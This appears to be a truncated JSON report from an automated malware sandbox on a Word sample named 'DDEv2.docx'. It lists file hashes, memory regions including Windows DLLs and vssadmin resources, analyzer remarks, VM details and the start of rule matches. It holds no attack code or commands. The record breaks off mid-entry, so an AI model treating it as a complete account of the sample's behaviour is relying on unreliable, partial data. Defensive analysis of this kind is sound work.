"norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:38.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_5091", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:38.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_5092", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:38.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_5093", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:38.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 6160383, "entry_point": 0, "filename": null, "id": "region_5094", "name": "private_0x00000000004e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5111808, "timestamp": "00:01:38.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 7274495, "entry_point": 0, "filename": null, "id": "region_5095", "name": "private_0x00000000006e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7208960, "timestamp": "00:01:38.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1138688, "start_va": 1958215680, "type": "region", "version": 1 }, "end_va": 1959354367, "entry_point": 1958215680, "filename": "\\Windows\\SysWOW64\\vssapi.dll", "id": "region_5096", "name": "vssapi.dll", "norm_filename": "c:\\windows\\syswow64\\vssapi.dll", "region_type": "memory_mapped_file", "start_va": 1958215680, "timestamp": "00:01:38.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1959395328, "type": "region", "version": 1 }, "end_va": 1959460863, "entry_point": 1959395328, "filename": "\\Windows\\SysWOW64\\vsstrace.dll", "id": "region_5097", "name": "vsstrace.dll", "norm_filename": "c:\\windows\\syswow64\\vsstrace.dll", "region_type": "memory_mapped_file", "start_va": 1959395328, "timestamp": "00:01:38.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1959460864, "type": "region", "version": 1 }, "end_va": 1959542783, "entry_point": 1959468457, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_5098", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1959460864, "timestamp": "00:01:38.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_5099", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:38.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_5100", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:38.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_5101", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:38.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_5102", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:38.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_5103", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:38.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_5104", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:38.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_5105", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:38.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_5106", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:38.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_5107", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:38.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_5108", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:38.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_5109", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:38.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_5110", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:38.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_5111", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:38.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_5112", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:38.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_5113", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:38.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_5114", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:38.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7274496, "type": "region", "version": 1 }, "end_va": 8880127, "entry_point": 0, "filename": null, "id": "region_5115", "name": "pagefile_0x00000000006f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7274496, "timestamp": "00:01:38.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_5116", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:38.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_5117", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:38.603", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_5118", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:38.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_5119", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:38.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 53248, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1036287, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui", "id": "region_5120", "name": "vssadmin.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:38.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_5121", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:38.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_5122", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:38.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_5123", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:38.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_5124", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:38.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_5125", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:01:38.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 10354688, "type": "region", "version": 1 }, "end_va": 11931647, "entry_point": 0, "filename": null, "id": "region_5126", "name": "pagefile_0x00000000009e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10354688, "timestamp": "00:01:38.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11993088, "type": "region", "version": 1 }, "end_va": 32964607, "entry_point": 0, "filename": null, "id": "region_5127", "name": "pagefile_0x0000000000b70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11993088, "timestamp": "00:01:38.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_5128", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:38.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_5129", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:38.681", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_5130", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:38.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_5131", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:01:38.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6619135, "entry_point": 0, "filename": null, "id": "region_5132", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:38.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_5133", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:38.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_5134", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:38.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_5135", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:38.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 35909631, "entry_point": 32964608, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_5136", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32964608, "timestamp": "00:01:38.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_5137", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:38.696", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 }, { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 }, { "comment": "The operating system was rebooted during the analysis.", "id": 128, "type": "remark", "version": 1 }, { "comment": "The overall sleep time of all monitored processes was truncated from 10.51 milliseconds to 1.0 milliseconds to reveal dormant functionality.", "id": 262144, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "DDEv2.docx", "id": 19692, "md5_hash": "5786dbcbe1959b2978e979bf1c5cb450", "sample_type": "word_document", "sha1_hash": "0dd5a58e89036beaa7a63c9f5541bf1402c9c4d4", "sha256_hash": "bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9", "size": 22016, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 85980, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_29245.png", "size": 80211, "thumbnail_archive_path": "screenshots/thumbnail_29245.png", "timestamp": "00:00:29.245", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_30248.png", "size": 86143, "thumbnail_archive_path": "screenshots/thumbnail_30248.png", "timestamp": "00:00:30.248", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_31250.png", "size": 86144, "thumbnail_archive_path": "screenshots/thumbnail_31250.png", "timestamp": "00:00:31.250", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_34580.png", "size": 92287, "thumbnail_archive_path": "screenshots/thumbnail_34580.png", "timestamp": "00:00:34.580", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_36082.png", "size": 86073, "thumbnail_archive_path": "screenshots/thumbnail_36082.png", "timestamp": "00:00:36.082", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_68244.png", "size": 92759, "thumbnail_archive_path": "screenshots/thumbnail_68244.png", "timestamp": "00:01:08.244", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_70258.png", "size": 86581, "thumbnail_archive_path": "screenshots/thumbnail_70258.png", "timestamp": "00:01:10.258", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_75359.png", "size": 90677, "thumbnail_archive_path": "screenshots/thumbnail_75359.png", "timestamp": "00:01:15.359", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_82476.png", "size": 101328, "thumbnail_archive_path": "screenshots/thumbnail_82476.png", "timestamp": "00:01:22.476", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_83480.png", "size": 102728, "thumbnail_archive_path": "screenshots/thumbnail_83480.png", "timestamp": "00:01:23.480", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_85500.png", "size": 1002092, "thumbnail_archive_path": "screenshots/thumbnail_85500.png", "timestamp": "00:01:25.500", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_86517.png", "size": 801300, "thumbnail_archive_path": "screenshots/thumbnail_86517.png", "timestamp": "00:01:26.517", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_88544.png", "size": 782185, "thumbnail_archive_path": "screenshots/thumbnail_88544.png", "timestamp": "00:01:28.544", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_91586.png", "size": 792776, "thumbnail_archive_path": "screenshots/thumbnail_91586.png", "timestamp": "00:01:31.586", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_93026.png", "size": 792773, "thumbnail_archive_path": "screenshots/thumbnail_93026.png", "timestamp": "00:01:33.026", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_94586.png", "size": 800404, "thumbnail_archive_path": "screenshots/thumbnail_94586.png", "timestamp": "00:01:34.586", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_97624.png", "size": 442548, "thumbnail_archive_path": "screenshots/thumbnail_97624.png", "timestamp": "00:01:37.624", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_139436.png", "size": 4187, "thumbnail_archive_path": "screenshots/thumbnail_139436.png", "timestamp": "00:02:19.436", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_141440.png", "size": 488536, "thumbnail_archive_path": "screenshots/thumbnail_141440.png", "timestamp": "00:02:21.440", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_143449.png", "size": 992337, "thumbnail_archive_path": "screenshots/thumbnail_143449.png", "timestamp": "00:02:23.449", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-09-28 17:24", "analyzer_version": "2.2.0", "chrome_version": "59.0.3071.104", "firefox_version": "25.0", "flash_version": "10.3.183.86", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.550", "microsoft_excel_version": "12.0.4518.1014", "microsoft_office_version": "12.0.4518.1014", "microsoft_power_point_version": "12.0.4518.1014", "microsoft_project_version": "12.0.4518.1014", "microsoft_publisher_version": "12.0.4518.1014", "microsoft_visio_version": "12.0.4518.1014", "microsoft_word_version": "12.0.4518.1014", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_64-bit", "vm_kernel_version": "6.1.7601.17514_(3844dbb9-2017-4967-be7a-a4a2c20430fa)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [ { "mutex_name": "Local\\!PrivacIE!SharedMemory!Mutex", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_install_ipc_endpoint", "operation_desc": "Create system object", "ref_gfncalls": 